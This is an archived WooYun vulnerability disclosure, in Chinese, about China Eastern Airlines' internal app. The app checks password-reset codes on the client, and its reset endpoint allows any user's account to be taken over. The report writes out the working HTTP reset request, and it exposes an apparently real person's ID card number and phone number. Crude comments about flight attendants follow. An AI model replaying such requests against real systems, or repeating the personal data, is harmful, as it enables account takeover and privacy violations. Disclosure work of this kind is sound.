中国东方航空股份有限公司某内部APP设计缺陷任意用户密码重置等

2017年5月2日13:06:12评论817 views字数 232阅读0分46秒阅读模式

摘要

2016-05-10：细节已通知厂商并且等待厂商处理中
2016-05-10：厂商已经确认，细节仅向厂商公开
2016-05-20：细节向核心白帽子及相关领域专家公开
2016-05-30：细节向普通白帽子公开
2016-06-09：细节向实习白帽子公开
2016-06-24：细节向公众公开

漏洞概要关注数(10) 关注此漏洞

缺陷编号： WooYun-2016-206958

漏洞标题：中国东方航空股份有限公司某内部APP设计缺陷任意用户密码重置等

漏洞作者：高小厨

提交时间： 2016-05-10 10:23

公开时间： 2016-06-24 11:00

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank： 15

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：设计缺陷/边界绕过

0人收藏

漏洞详情

披露状态：

简要描述：

你喜欢的空姐，这里都有

详细说明：

在这里http://apps.ceair.com下载掌上东航APP

1、涉及多个系统

2、重置密码试试

随意使用用户名，手机号，身份证，然后输入任意验证码尝试，发现并未进行发包，判断验证码应该进行本地校验

果然，拿用户yanshouzhen，身份证号：140102196008226036等多个信息进行尝试，发现手机验证码和手机号都返回了，然并卵，最后新的密码会发到用户手机上

但是发现了可以的数据包，发现可以修改任意用户的密码，只要遍历id即可，密码就会发的自己的手机上

code 区域

POST /mas/appCenter/accountService?method=resetPassword HTTP/1.1
 Host: mumobile30.ceair.com
 Content-Type: application/x-www-form-urlencoded; charset=utf-8
 User-Agent: 
 Content-Length: 31
 Accept-Encoding: gzip
 Connection: close
 
 uid=wangwei&mobile=13185745416

3、修改手机号为自己的

漏洞证明：

4、证明（各种个人信息）

5、证明（可进行办公邮件查收等等，由于是统一办公体系web上的也能登录）

6、仅证明危害存在，未深入，未做违法操作

修复方案：

内部APP是企业安全防御边界

版权声明：转载请注明来源高小厨@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-05-10 10:57

厂商回复：

十分感谢！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-10 10:31 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦我的宝贝 | ..)

0

给表弟来两斤制服诱惑

1# 回复此人
2016-05-10 10:40 | Fnut ( 普通白帽子 | Rank:112 漏洞数:28 | 大王叫我来巡山，巡完南山巡北山)

0

专注app一百年。。大牛求带

2# 回复此人
2016-05-10 10:41 | Mystery。 ( 路人 | Rank:7 漏洞数:1 | 路人甲抄袭个漏洞换邀请码。)

0

能来个厨子吗，带护心毛那种

3# 回复此人
2016-05-10 11:00 | 高小厨 ( 普通白帽子 | Rank:998 漏洞数:91 | 不会吹牛的小二不是好厨子！)

0

大东航，你们的rank给的越来越不地道了，学学南航

4# 回复此人

漏洞概要 关注数(10) 关注此漏洞

缺陷编号： WooYun-2016-206958

漏洞标题： 中国东方航空股份有限公司某内部APP设计缺陷任意用户密码重置等

相关厂商： 中国东方航空股份有限公司

漏洞作者： 高小厨